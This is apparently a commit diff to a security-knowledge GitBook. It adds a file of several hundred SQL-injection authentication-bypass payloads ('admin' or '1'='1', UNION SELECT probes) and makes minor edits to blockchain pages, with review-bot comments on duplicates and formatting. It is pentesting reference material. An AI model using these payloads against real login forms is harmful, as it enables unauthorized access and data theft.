GitBook: [#3092] No subject
BIN
.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1).png
Normal file
BIN
.gitbook/assets/image (307) (3).png
Normal file
BIN
.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1).png
Normal file
BIN
.gitbook/assets/image (413) (3) (3) (3) (2) (1) (2).png
Normal file
BIN
.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1).png
Normal file
BIN
.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (2).png
Normal file
BIN
.gitbook/assets/image (620) (1).png
Normal file
BIN
.gitbook/assets/image (638) (1) (1).png
Normal file
BIN
.gitbook/assets/image (638) (1) (2).png
Normal file
771
.gitbook/assets/sqli-authbypass-big (1).txt
Normal file
|
@ -0,0 +1,771 @@
|
|||
'-'
|
||||
' '
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
' or ''-'
|
||||
' or '' '
|
||||
' or ''&'
|
||||
' or ''^'
|
||||
' or ''*'
|
||||
"-"
|
||||
" "
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
" or ""-"
|
||||
" or "" "
|
||||
" or ""&"
|
||||
" or ""^"
|
||||
" or ""*"
|
||||
or true--
|
||||
" or true--
|
||||
' or true--
|
||||
") or true--
|
||||
') or true--
|
||||
' or 'x'='x
|
||||
') or ('x')=('x
|
||||
')) or (('x'))=(('x
|
||||
" or "x"="x
|
||||
") or ("x")=("x
|
||||
")) or (("x"))=(("x
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1#
|
||||
or 1=1/*
|
||||
admin' --
|
||||
admin' #
|
||||
admin'/*
|
||||
admin' or '1'='1
|
||||
admin' or '1'='1'--
|
||||
admin' or '1'='1'#
|
||||
admin' or '1'='1'/*
|
||||
admin'or 1=1 or ''='
|
||||
admin' or 1=1
|
||||
admin' or 1=1--
|
||||
admin' or 1=1#
|
||||
admin' or 1=1/*
|
||||
admin') or ('1'='1
|
||||
admin') or ('1'='1'--
|
||||
admin') or ('1'='1'#
|
||||
admin') or ('1'='1'/*
|
||||
admin') or '1'='1
|
||||
admin') or '1'='1'--
|
||||
admin') or '1'='1'#
|
||||
admin') or '1'='1'/*
|
||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
admin" --
|
||||
admin" #
|
||||
admin"/*
|
||||
admin" or "1"="1
|
||||
admin" or "1"="1"--
|
||||
admin" or "1"="1"#
|
||||
admin" or "1"="1"/*
|
||||
admin"or 1=1 or ""="
|
||||
admin" or 1=1
|
||||
admin" or 1=1--
|
||||
admin" or 1=1#
|
||||
admin" or 1=1/*
|
||||
admin") or ("1"="1
|
||||
admin") or ("1"="1"--
|
||||
admin") or ("1"="1"#
|
||||
admin") or ("1"="1"/*
|
||||
admin") or "1"="1
|
||||
admin") or "1"="1"--
|
||||
admin") or "1"="1"#
|
||||
admin") or "1"="1"/*
|
||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
==
|
||||
=
|
||||
'
|
||||
' --
|
||||
' #
|
||||
' –
|
||||
'--
|
||||
'/*
|
||||
'#
|
||||
" --
|
||||
" #
|
||||
"/*
|
||||
' and 1='1
|
||||
' and a='a
|
||||
or 1=1
|
||||
or true
|
||||
' or ''='
|
||||
" or ""="
|
||||
1′) and '1′='1–
|
||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
||||
and 1=1
|
||||
and 1=1–
|
||||
' and 'one'='one
|
||||
' and 'one'='one–
|
||||
' group by password having 1=1--
|
||||
' group by userid having 1=1--
|
||||
' group by username having 1=1--
|
||||
like '%'
|
||||
or 0=0 --
|
||||
or 0=0 #
|
||||
or 0=0 –
|
||||
' or 0=0 #
|
||||
' or 0=0 --
|
||||
' or 0=0 #
|
||||
' or 0=0 –
|
||||
" or 0=0 --
|
||||
" or 0=0 #
|
||||
" or 0=0 –
|
||||
%' or '0'='0
|
||||
or 1=1
|
||||
or 1=1--
|
||||
or 1=1/*
|
||||
or 1=1#
|
||||
or 1=1–
|
||||
' or 1=1--
|
||||
' or '1'='1
|
||||
' or '1'='1'--
|
||||
' or '1'='1'/*
|
||||
' or '1'='1'#
|
||||
' or '1′='1
|
||||
' or 1=1
|
||||
' or 1=1 --
|
||||
' or 1=1 –
|
||||
' or 1=1--
|
||||
' or 1=1;#
|
||||
' or 1=1/*
|
||||
' or 1=1#
|
||||
' or 1=1–
|
||||
') or '1'='1
|
||||
') or '1'='1--
|
||||
') or '1'='1'--
|
||||
') or '1'='1'/*
|
||||
') or '1'='1'#
|
||||
') or ('1'='1
|
||||
') or ('1'='1--
|
||||
') or ('1'='1'--
|
||||
') or ('1'='1'/*
|
||||
') or ('1'='1'#
|
||||
'or'1=1
|
||||
'or'1=1′
|
||||
" or "1"="1
|
||||
" or "1"="1"--
|
||||
" or "1"="1"/*
|
||||
" or "1"="1"#
|
||||
" or 1=1
|
||||
" or 1=1 --
|
||||
" or 1=1 –
|
||||
" or 1=1--
|
||||
" or 1=1/*
|
||||
" or 1=1#
|
||||
" or 1=1–
|
||||
") or "1"="1
|
||||
") or "1"="1"--
|
||||
") or "1"="1"/*
|
||||
") or "1"="1"#
|
||||
") or ("1"="1
|
||||
") or ("1"="1"--
|
||||
") or ("1"="1"/*
|
||||
") or ("1"="1"#
|
||||
) or '1′='1–
|
||||
) or ('1′='1–
|
||||
' or 1=1 LIMIT 1;#
|
||||
'or 1=1 or ''='
|
||||
"or 1=1 or ""="
|
||||
' or 'a'='a
|
||||
' or a=a--
|
||||
' or a=a–
|
||||
') or ('a'='a
|
||||
" or "a"="a
|
||||
") or ("a"="a
|
||||
') or ('a'='a and hi") or ("a"="a
|
||||
' or 'one'='one
|
||||
' or 'one'='one–
|
||||
' or uid like '%
|
||||
' or uname like '%
|
||||
' or userid like '%
|
||||
' or user like '%
|
||||
' or username like '%
|
||||
' or 'x'='x
|
||||
') or ('x'='x
|
||||
" or "x"="x
|
||||
' OR 'x'='x'#;
|
||||
'=' 'or' and '=' 'or'
|
||||
' UNION ALL SELECT 1, @@version;#
|
||||
' UNION ALL SELECT system_user(),user();#
|
||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
||||
admin' and substring(password/text(),1,1)='7
|
||||
' and substring(password/text(),1,1)='7
|
||||
|
||||
==
|
||||
=
|
||||
'
|
||||
"
|
||||
'-- 2
|
||||
'/*
|
||||
'#
|
||||
"-- 2
|
||||
" #
|
||||
"/*
|
||||
'-'
|
||||
'&'
|
||||
'^'
|
||||
'*'
|
||||
'='
|
||||
0'<'2
|
||||
"-"
|
||||
"&"
|
||||
"^"
|
||||
"*"
|
||||
"="
|
||||
0"<"2
|
||||
|
||||
')
|
||||
")
|
||||
')-- 2
|
||||
')/*
|
||||
')#
|
||||
")-- 2
|
||||
") #
|
||||
")/*
|
||||
')-('
|
||||
')&('
|
||||
')^('
|
||||
')*('
|
||||
')=('
|
||||
0')<('2
|
||||
")-("
|
||||
")&("
|
||||
")^("
|
||||
")*("
|
||||
")=("
|
||||
0")<("2
|
||||
|
||||
'-''-- 2
|
||||
'-''#
|
||||
'-''/*
|
||||
'&''-- 2
|
||||
'&''#
|
||||
'&''/*
|
||||
'^''-- 2
|
||||
'^''#
|
||||
'^''/*
|
||||
'*''-- 2
|
||||
'*''#
|
||||
'*''/*
|
||||
'=''-- 2
|
||||
'=''#
|
||||
'=''/*
|
||||
0'<'2'-- 2
|
||||
0'<'2'#
|
||||
0'<'2'/*
|
||||
"-""-- 2
|
||||
"-""#
|
||||
"-""/*
|
||||
"&""-- 2
|
||||
"&""#
|
||||
"&""/*
|
||||
"^""-- 2
|
||||
"^""#
|
||||
"^""/*
|
||||
"*""-- 2
|
||||
"*""#
|
||||
"*""/*
|
||||
"=""-- 2
|
||||
"=""#
|
||||
"=""/*
|
||||
0"<"2"-- 2
|
||||
0"<"2"#
|
||||
0"<"2"/*
|
||||
|
||||
')-''-- 2
|
||||
')-''#
|
||||
')-''/*
|
||||
')&''-- 2
|
||||
')&''#
|
||||
')&''/*
|
||||
')^''-- 2
|
||||
')^''#
|
||||
')^''/*
|
||||
')*''-- 2
|
||||
')*''#
|
||||
')*''/*
|
||||
')=''-- 2
|
||||
')=''#
|
||||
')=''/*
|
||||
0')<'2'-- 2
|
||||
0')<'2'#
|
||||
0')<'2'/*
|
||||
")-""-- 2
|
||||
")-""#
|
||||
")-""/*
|
||||
")&""-- 2
|
||||
")&""#
|
||||
")&""/*
|
||||
")^""-- 2
|
||||
")^""#
|
||||
")^""/*
|
||||
")*""-- 2
|
||||
")*""#
|
||||
")*""/*
|
||||
")=""-- 2
|
||||
")=""#
|
||||
")=""/*
|
||||
0")<"2-- 2
|
||||
0")<"2#
|
||||
0")<"2/*
|
||||
|
||||
|
||||
'oR'2
|
||||
'oR'2'-- 2
|
||||
'oR'2'#
|
||||
'oR'2'/*
|
||||
'oR'2'oR'
|
||||
'oR(2)-- 2
|
||||
'oR(2)#
|
||||
'oR(2)/*
|
||||
'oR(2)oR'
|
||||
'oR 2-- 2
|
||||
'oR 2#
|
||||
'oR 2/*
|
||||
'oR 2 oR'
|
||||
'oR/**/2-- 2
|
||||
'oR/**/2#
|
||||
'oR/**/2/*
|
||||
'oR/**/2/**/oR'
|
||||
"oR"2
|
||||
"oR"2"-- 2
|
||||
"oR"2"#
|
||||
"oR"2"/*
|
||||
"oR"2"oR"
|
||||
"oR(2)-- 2
|
||||
"oR(2)#
|
||||
"oR(2)/*
|
||||
"oR(2)oR"
|
||||
"oR 2-- 2
|
||||
"oR 2#
|
||||
"oR 2/*
|
||||
"oR 2 oR"
|
||||
"oR/**/2-- 2
|
||||
"oR/**/2#
|
||||
"oR/**/2/*
|
||||
"oR/**/2/**/oR"
|
||||
|
||||
'oR'2'='2
|
||||
'oR'2'='2'oR'
|
||||
'oR'2'='2'-- 2
|
||||
'oR'2'='2'#
|
||||
'oR'2'='2'/*
|
||||
'oR'2'='2'oR'
|
||||
'oR 2=2-- 2
|
||||
'oR 2=2#
|
||||
'oR 2=2/*
|
||||
'oR 2=2 oR'
|
||||
'oR/**/2=2-- 2
|
||||
'oR/**/2=2#
|
||||
'oR/**/2=2/*
|
||||
'oR/**/2=2/**/oR'
|
||||
'oR(2)=2-- 2
|
||||
'oR(2)=2#
|
||||
'oR(2)=2/*
|
||||
'oR(2)=2/*
|
||||
'oR(2)=(2)oR'
|
||||
'oR'2'='2' LimIT 1-- 2
|
||||
'oR'2'='2' LimIT 1#
|
||||
'oR'2'='2' LimIT 1/*
|
||||
'oR(2)=(2)LimIT(1)-- 2
|
||||
'oR(2)=(2)LimIT(1)#
|
||||
'oR(2)=(2)LimIT(1)/*
|
||||
"oR"2"="2
|
||||
"oR"2"="2"oR"
|
||||
"oR"2"="2"-- 2
|
||||
"oR"2"="2"#
|
||||
"oR"2"="2"/*
|
||||
"oR"2"="2"oR"
|
||||
"oR 2=2-- 2
|
||||
"oR 2=2#
|
||||
"oR 2=2/*
|
||||
"oR 2=2 oR"
|
||||
"oR/**/2=2-- 2
|
||||
"oR/**/2=2#
|
||||
"oR/**/2=2/*
|
||||
"oR/**/2=2/**/oR"
|
||||
"oR(2)=2-- 2
|
||||
"oR(2)=2#
|
||||
"oR(2)=2/*
|
||||
"oR(2)=2/*
|
||||
"oR(2)=(2)oR"
|
||||
"oR"2"="2" LimIT 1-- 2
|
||||
"oR"2"="2" LimIT 1#
|
||||
"oR"2"="2" LimIT 1/*
|
||||
"oR(2)=(2)LimIT(1)-- 2
|
||||
"oR(2)=(2)LimIT(1)#
|
||||
"oR(2)=(2)LimIT(1)/*
|
||||
|
||||
'oR true-- 2
|
||||
'oR true#
|
||||
'oR true/*
|
||||
'oR true oR'
|
||||
'oR(true)-- 2
|
||||
'oR(true)#
|
||||
'oR(true)/*
|
||||
'oR(true)oR'
|
||||
'oR/**/true-- 2
|
||||
'oR/**/true#
|
||||
'oR/**/true/*
|
||||
'oR/**/true/**/oR'
|
||||
"oR true-- 2
|
||||
"oR true#
|
||||
"oR true/*
|
||||
"oR true oR"
|
||||
"oR(true)-- 2
|
||||
"oR(true)#
|
||||
"oR(true)/*
|
||||
"oR(true)oR"
|
||||
"oR/**/true-- 2
|
||||
"oR/**/true#
|
||||
"oR/**/true/*
|
||||
"oR/**/true/**/oR"
|
||||
|
||||
'oR'2'LiKE'2
|
||||
'oR'2'LiKE'2'-- 2
|
||||
'oR'2'LiKE'2'#
|
||||
'oR'2'LiKE'2'/*
|
||||
'oR'2'LiKE'2'oR'
|
||||
'oR(2)LiKE(2)-- 2
|
||||
'oR(2)LiKE(2)#
|
||||
'oR(2)LiKE(2)/*
|
||||
'oR(2)LiKE(2)oR'
|
||||
"oR"2"LiKE"2
|
||||
"oR"2"LiKE"2"-- 2
|
||||
"oR"2"LiKE"2"#
|
||||
"oR"2"LiKE"2"/*
|
||||
"oR"2"LiKE"2"oR"
|
||||
"oR(2)LiKE(2)-- 2
|
||||
"oR(2)LiKE(2)#
|
||||
"oR(2)LiKE(2)/*
|
||||
"oR(2)LiKE(2)oR"
|
||||
|
||||
admin
|
||||
admin'-- 2
|
||||
admin'#
|
||||
admin'/*
|
||||
admin"-- 2
|
||||
admin"#
|
||||
ffifdyop
|
||||
|
||||
' UniON SElecT 1,2-- 2
|
||||
' UniON SElecT 1,2,3-- 2
|
||||
' UniON SElecT 1,2,3,4-- 2
|
||||
' UniON SElecT 1,2,3,4,5-- 2
|
||||
' UniON SElecT 1,2#
|
||||
' UniON SElecT 1,2,3#
|
||||
' UniON SElecT 1,2,3,4#
|
||||
' UniON SElecT 1,2,3,4,5#
|
||||
'UniON(SElecT(1),2)-- 2
|
||||
'UniON(SElecT(1),2,3)-- 2
|
||||
'UniON(SElecT(1),2,3,4)-- 2
|
||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
||||
'UniON(SElecT(1),2)#
|
||||
'UniON(SElecT(1),2,3)#
|
||||
'UniON(SElecT(1),2,3,4)#
|
||||
'UniON(SElecT(1),2,3,4,5)#
|
||||
" UniON SElecT 1,2-- 2
|
||||
" UniON SElecT 1,2,3-- 2
|
||||
" UniON SElecT 1,2,3,4-- 2
|
||||
" UniON SElecT 1,2,3,4,5-- 2
|
||||
" UniON SElecT 1,2#
|
||||
" UniON SElecT 1,2,3#
|
||||
" UniON SElecT 1,2,3,4#
|
||||
" UniON SElecT 1,2,3,4,5#
|
||||
"UniON(SElecT(1),2)-- 2
|
||||
"UniON(SElecT(1),2,3)-- 2
|
||||
"UniON(SElecT(1),2,3,4)-- 2
|
||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
||||
"UniON(SElecT(1),2)#
|
||||
"UniON(SElecT(1),2,3)#
|
||||
"UniON(SElecT(1),2,3,4)#
|
||||
"UniON(SElecT(1),2,3,4,5)#
|
||||
|
||||
'||'2
|
||||
'||2-- 2
|
||||
'||'2'||'
|
||||
'||2#
|
||||
'||2/*
|
||||
'||2||'
|
||||
"||"2
|
||||
"||2-- 2
|
||||
"||"2"||"
|
||||
"||2#
|
||||
"||2/*
|
||||
"||2||"
|
||||
'||'2'='2
|
||||
'||'2'='2'||'
|
||||
'||2=2-- 2
|
||||
'||2=2#
|
||||
'||2=2/*
|
||||
'||2=2||'
|
||||
"||"2"="2
|
||||
"||"2"="2"||"
|
||||
"||2=2-- 2
|
||||
"||2=2#
|
||||
"||2=2/*
|
||||
"||2=2||"
|
||||
'||2=(2)LimIT(1)-- 2
|
||||
'||2=(2)LimIT(1)#
|
||||
'||2=(2)LimIT(1)/*
|
||||
"||2=(2)LimIT(1)-- 2
|
||||
"||2=(2)LimIT(1)#
|
||||
"||2=(2)LimIT(1)/*
|
||||
'||true-- 2
|
||||
'||true#
|
||||
'||true/*
|
||||
'||true||'
|
||||
"||true-- 2
|
||||
"||true#
|
||||
"||true/*
|
||||
"||true||"
|
||||
'||'2'LiKE'2
|
||||
'||'2'LiKE'2'-- 2
|
||||
'||'2'LiKE'2'#
|
||||
'||'2'LiKE'2'/*
|
||||
'||'2'LiKE'2'||'
|
||||
'||(2)LiKE(2)-- 2
|
||||
'||(2)LiKE(2)#
|
||||
'||(2)LiKE(2)/*
|
||||
'||(2)LiKE(2)||'
|
||||
"||"2"LiKE"2
|
||||
"||"2"LiKE"2"-- 2
|
||||
"||"2"LiKE"2"#
|
||||
"||"2"LiKE"2"/*
|
||||
"||"2"LiKE"2"||"
|
||||
"||(2)LiKE(2)-- 2
|
||||
"||(2)LiKE(2)#
|
||||
"||(2)LiKE(2)/*
|
||||
"||(2)LiKE(2)||"
|
||||
|
||||
')oR('2
|
||||
')oR'2'-- 2
|
||||
')oR'2'#
|
||||
')oR'2'/*
|
||||
')oR'2'oR('
|
||||
')oR(2)-- 2
|
||||
')oR(2)#
|
||||
')oR(2)/*
|
||||
')oR(2)oR('
|
||||
')oR 2-- 2
|
||||
')oR 2#
|
||||
')oR 2/*
|
||||
')oR 2 oR('
|
||||
')oR/**/2-- 2
|
||||
')oR/**/2#
|
||||
')oR/**/2/*
|
||||
')oR/**/2/**/oR('
|
||||
")oR("2
|
||||
")oR"2"-- 2
|
||||
")oR"2"#
|
||||
")oR"2"/*
|
||||
")oR"2"oR("
|
||||
")oR(2)-- 2
|
||||
")oR(2)#
|
||||
")oR(2)/*
|
||||
")oR(2)oR("
|
||||
")oR 2-- 2
|
||||
")oR 2#
|
||||
")oR 2/*
|
||||
")oR 2 oR("
|
||||
")oR/**/2-- 2
|
||||
")oR/**/2#
|
||||
")oR/**/2/*
|
||||
")oR/**/2/**/oR("
|
||||
')oR'2'=('2
|
||||
')oR'2'='2'oR('
|
||||
')oR'2'='2'-- 2
|
||||
')oR'2'='2'#
|
||||
')oR'2'='2'/*
|
||||
')oR'2'='2'oR('
|
||||
')oR 2=2-- 2
|
||||
')oR 2=2#
|
||||
')oR 2=2/*
|
||||
')oR 2=2 oR('
|
||||
')oR/**/2=2-- 2
|
||||
')oR/**/2=2#
|
||||
')oR/**/2=2/*
|
||||
')oR/**/2=2/**/oR('
|
||||
')oR(2)=2-- 2
|
||||
')oR(2)=2#
|
||||
')oR(2)=2/*
|
||||
')oR(2)=2/*
|
||||
')oR(2)=(2)oR('
|
||||
')oR'2'='2' LimIT 1-- 2
|
||||
')oR'2'='2' LimIT 1#
|
||||
')oR'2'='2' LimIT 1/*
|
||||
')oR(2)=(2)LimIT(1)-- 2
|
||||
')oR(2)=(2)LimIT(1)#
|
||||
')oR(2)=(2)LimIT(1)/*
|
||||
")oR"2"=("2
|
||||
")oR"2"="2"oR("
|
||||
")oR"2"="2"-- 2
|
||||
")oR"2"="2"#
|
||||
")oR"2"="2"/*
|
||||
")oR"2"="2"oR("
|
||||
")oR 2=2-- 2
|
||||
")oR 2=2#
|
||||
")oR 2=2/*
|
||||
")oR 2=2 oR("
|
||||
")oR/**/2=2-- 2
|
||||
")oR/**/2=2#
|
||||
")oR/**/2=2/*
|
||||
")oR/**/2=2/**/oR("
|
||||
")oR(2)=2-- 2
|
||||
")oR(2)=2#
|
||||
")oR(2)=2/*
|
||||
")oR(2)=2/*
|
||||
")oR(2)=(2)oR("
|
||||
")oR"2"="2" LimIT 1-- 2
|
||||
")oR"2"="2" LimIT 1#
|
||||
")oR"2"="2" LimIT 1/*
|
||||
")oR(2)=(2)LimIT(1)-- 2
|
||||
")oR(2)=(2)LimIT(1)#
|
||||
")oR(2)=(2)LimIT(1)/*
|
||||
')oR true-- 2
|
||||
')oR true#
|
||||
')oR true/*
|
||||
')oR true oR('
|
||||
')oR(true)-- 2
|
||||
')oR(true)#
|
||||
')oR(true)/*
|
||||
')oR(true)oR('
|
||||
')oR/**/true-- 2
|
||||
')oR/**/true#
|
||||
')oR/**/true/*
|
||||
')oR/**/true/**/oR('
|
||||
")oR true-- 2
|
||||
")oR true#
|
||||
")oR true/*
|
||||
")oR true oR("
|
||||
")oR(true)-- 2
|
||||
")oR(true)#
|
||||
")oR(true)/*
|
||||
")oR(true)oR("
|
||||
")oR/**/true-- 2
|
||||
")oR/**/true#
|
||||
")oR/**/true/*
|
||||
")oR/**/true/**/oR("
|
||||
')oR'2'LiKE('2
|
||||
')oR'2'LiKE'2'-- 2
|
||||
')oR'2'LiKE'2'#
|
||||
')oR'2'LiKE'2'/*
|
||||
')oR'2'LiKE'2'oR('
|
||||
')oR(2)LiKE(2)-- 2
|
||||
')oR(2)LiKE(2)#
|
||||
')oR(2)LiKE(2)/*
|
||||
')oR(2)LiKE(2)oR('
|
||||
")oR"2"LiKE("2
|
||||
")oR"2"LiKE"2"-- 2
|
||||
")oR"2"LiKE"2"#
|
||||
")oR"2"LiKE"2"/*
|
||||
")oR"2"LiKE"2"oR("
|
||||
")oR(2)LiKE(2)-- 2
|
||||
")oR(2)LiKE(2)#
|
||||
")oR(2)LiKE(2)/*
|
||||
")oR(2)LiKE(2)oR("
|
||||
admin')-- 2
|
||||
admin')#
|
||||
admin')/*
|
||||
admin")-- 2
|
||||
admin")#
|
||||
') UniON SElecT 1,2-- 2
|
||||
') UniON SElecT 1,2,3-- 2
|
||||
') UniON SElecT 1,2,3,4-- 2
|
||||
') UniON SElecT 1,2,3,4,5-- 2
|
||||
') UniON SElecT 1,2#
|
||||
') UniON SElecT 1,2,3#
|
||||
') UniON SElecT 1,2,3,4#
|
||||
') UniON SElecT 1,2,3,4,5#
|
||||
')UniON(SElecT(1),2)-- 2
|
||||
')UniON(SElecT(1),2,3)-- 2
|
||||
')UniON(SElecT(1),2,3,4)-- 2
|
||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
||||
')UniON(SElecT(1),2)#
|
||||
')UniON(SElecT(1),2,3)#
|
||||
')UniON(SElecT(1),2,3,4)#
|
||||
')UniON(SElecT(1),2,3,4,5)#
|
||||
") UniON SElecT 1,2-- 2
|
||||
") UniON SElecT 1,2,3-- 2
|
||||
") UniON SElecT 1,2,3,4-- 2
|
||||
") UniON SElecT 1,2,3,4,5-- 2
|
||||
") UniON SElecT 1,2#
|
||||
") UniON SElecT 1,2,3#
|
||||
") UniON SElecT 1,2,3,4#
|
||||
") UniON SElecT 1,2,3,4,5#
|
||||
")UniON(SElecT(1),2)-- 2
|
||||
")UniON(SElecT(1),2,3)-- 2
|
||||
")UniON(SElecT(1),2,3,4)-- 2
|
||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
||||
")UniON(SElecT(1),2)#
|
||||
")UniON(SElecT(1),2,3)#
|
||||
")UniON(SElecT(1),2,3,4)#
|
||||
")UniON(SElecT(1),2,3,4,5)#
|
||||
')||('2
|
||||
')||2-- 2
|
||||
')||'2'||('
|
||||
')||2#
|
||||
')||2/*
|
||||
')||2||('
|
||||
")||("2
|
||||
")||2-- 2
|
||||
")||"2"||("
|
||||
")||2#
|
||||
")||2/*
|
||||
")||2||("
|
||||
')||'2'=('2
|
||||
')||'2'='2'||('
|
||||
')||2=2-- 2
|
||||
')||2=2#
|
||||
')||2=2/*
|
||||
')||2=2||('
|
||||
")||"2"=("2
|
||||
")||"2"="2"||("
|
||||
")||2=2-- 2
|
||||
")||2=2#
|
||||
")||2=2/*
|
||||
")||2=2||("
|
||||
')||2=(2)LimIT(1)-- 2
|
||||
')||2=(2)LimIT(1)#
|
||||
')||2=(2)LimIT(1)/*
|
||||
")||2=(2)LimIT(1)-- 2
|
||||
")||2=(2)LimIT(1)#
|
||||
")||2=(2)LimIT(1)/*
|
||||
')||true-- 2
|
||||
')||true#
|
||||
')||true/*
|
||||
')||true||('
|
||||
")||true-- 2
|
||||
")||true#
|
||||
")||true/*
|
||||
")||true||("
|
||||
')||'2'LiKE('2
|
||||
')||'2'LiKE'2'-- 2
|
||||
')||'2'LiKE'2'#
|
||||
')||'2'LiKE'2'/*
|
||||
')||'2'LiKE'2'||('
|
||||
')||(2)LiKE(2)-- 2
|
||||
')||(2)LiKE(2)#
|
||||
')||(2)LiKE(2)/*
|
||||
')||(2)LiKE(2)||('
|
||||
")||"2"LiKE("2
|
||||
")||"2"LiKE"2"-- 2
|
||||
")||"2"LiKE"2"#
|
||||
")||"2"LiKE"2"/*
|
||||
")||"2"LiKE"2"||("
|
||||
")||(2)LiKE(2)-- 2
|
||||
")||(2)LiKE(2)#
|
||||
")||(2)LiKE(2)/*
|
||||
")||(2)LiKE(2)||("
|
||||
' UnION SELeCT 1,2`
|
||||
' UnION SELeCT 1,2,3`
|
||||
' UnION SELeCT 1,2,3,4`
|
||||
' UnION SELeCT 1,2,3,4,5`
|
||||
" UnION SELeCT 1,2`
|
||||
" UnION SELeCT 1,2,3`
|
||||
" UnION SELeCT 1,2,3,4`
|
||||
" UnION SELeCT 1,2,3,4,5`
|
|
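Review bot: several entries in `sqli-authbypass-big (1).txt` carry typographic characters that no database parses as a quote or a comment delimiter, e.g. `1′) and '1′='1–`, `' or 1=1–` and `) or ('1′='1–`, where `′` (U+2032) and `–` (U+2013) are copy-paste substitutes for `'` and `--`; those lines can never close a string or comment out the rest of a query, so they only add noise to a fuzz run and should be normalised to ASCII or dropped. The list also contains exact duplicates (`or 1=1` three times, `' or 0=0 #` twice, `'oR(2)=2/*` twice back to back), which a `sort -u` before committing would catch. Please also give the file a clean name; the ` (1)` in `sqli-authbypass-big (1).txt` is the browser's duplicate-download suffix.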
@ -10,7 +10,7 @@ dht udp "DHT Nodes"
|
|||
|
||||
![](<.gitbook/assets/image (273).png>)
|
||||
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1).png>)
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png>)
|
||||
|
||||
InfluxDB
|
||||
|
||||
|
|
|
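Review bot: the replacement reference `image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (2) (1) (1) (1) (1).png` is the same asset re-uploaded under one more `(n)` suffix (two near-identical copies of `image (345)` appear in this hunk alone, and the binary section at the top adds `(1)`/`(2)` twins of `image (413)`, `(446)` and `(638)`); point the page at one canonical asset and delete the copies, otherwise every edit keeps adding duplicate PNGs to the repository.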
@ -543,6 +543,7 @@
|
|||
* [Apache Airflow](cloud-security/apache-airflow/README.md)
|
||||
* [Airflow Configuration](cloud-security/apache-airflow/airflow-configuration.md)
|
||||
* [Airflow RBAC](cloud-security/apache-airflow/airflow-rbac.md)
|
||||
* [Atlantis](cloud-security/atlantis.md)
|
||||
* [Cloud Security Review](cloud-security/cloud-security-review.md)
|
||||
* [AWS Security](cloud-security/aws-security.md)
|
||||
|
||||
|
@ -558,7 +559,8 @@
|
|||
|
||||
## Blockchain
|
||||
|
||||
* [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies.md)
|
||||
* [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md)
|
||||
* [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md)
|
||||
|
||||
## Courses and Certifications Reviews
|
||||
|
||||
|
|
|
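Review bot: `* [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md)` links an empty placeholder into the table of contents: the new `page-1.md` further down in this change contains nothing but a `# Page 1` heading. Moving the existing page to `blockchain-and-crypto-currencies/README.md` is fine, but drop the `Page 1` entry and file until there is content, or an empty page ships in the book.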
@ -42,7 +42,7 @@ _**Sig**_ = _**Fsig**_(_**Fhash**_(_**m**_),_**dA**_)
|
|||
|
||||
Where:
|
||||
|
||||
* _d_A is the signing **private key**
|
||||
* \_d\_A is the signing **private key**
|
||||
* _m_ is the **transaction**
|
||||
* Fhash is the hashing function
|
||||
* Fsig is the signing algorithm
|
||||
|
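Review bot: `* \_d\_A is the signing **private key**` is an over-escaped version of `_d_A`; the backslashes make the underscores render literally instead of italicising `d`, while the next bullet still uses `_m_` and the formula line above uses `_**dA**_`, so the notation is now inconsistent within the same list. Keep `_d_A` (or `_d_<sub>A</sub>` if a subscript was the goal) rather than the escaped form the GitBook editor produced.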
@ -84,7 +84,7 @@ There are **2 main types** of transactions:
|
|||
This protocol helps to **perform several transactions to a channe**l and **just** **sent** the **final** **state** to the blockchain to save it.\
|
||||
This **improves** bitcoin blockchain **speed** (it just on allow 7 payments per second) and it allows to create **transactions more difficult to trace** as the channel is created via nodes of the bitcoin blockchain:
|
||||
|
||||
![](<../.gitbook/assets/image (611).png>)
|
||||
![](<../../.gitbook/assets/image (611).png>)
|
||||
|
||||
Normal use of the Lightning Network consists of **opening a payment channel** by committing a funding transaction to the relevant base blockchain (layer 1), followed by making **any number** of Lightning Network **transactions** that update the tentative distribution of the channel's funds **without broadcasting those to the blockchain**, optionally followed by closing the payment channel by **broadcasting** the **final** **version** of the settlement transaction to distribute the channel's funds.
|
||||
|
||||
|
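Review bot: the path change to `../../.gitbook/assets/image (611).png` matches the move of this page into `blockchain/blockchain-and-crypto-currencies/README.md` shown in the SUMMARY hunk, so it is correct; while touching this paragraph, the context line "(it just on allow 7 payments per second)" should read "(it only allows about 7 payments per second)".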
@ -175,7 +175,7 @@ Some other services can be also used as mixers, like Bitcoin casinos where you c
|
|||
### CoinJoin
|
||||
|
||||
**CoinJoin** will **mix several transactions of different users into just one** in order to make more **difficult** for an observer to find out **which input is related to which output**.\
|
||||
This offers a new level of privacy, however, **some** **transactions** where some input and output amounts are correlated or are very different from the rest of the inputs and outputs **can still be correlated** by the external observer.
|
||||
This offers a new level of privacy, however, **some** **transactions** where some input and output amounts are correlated or are very different from the rest of the inputs and outputs **can still be correlated** by the external observer.
|
||||
|
||||
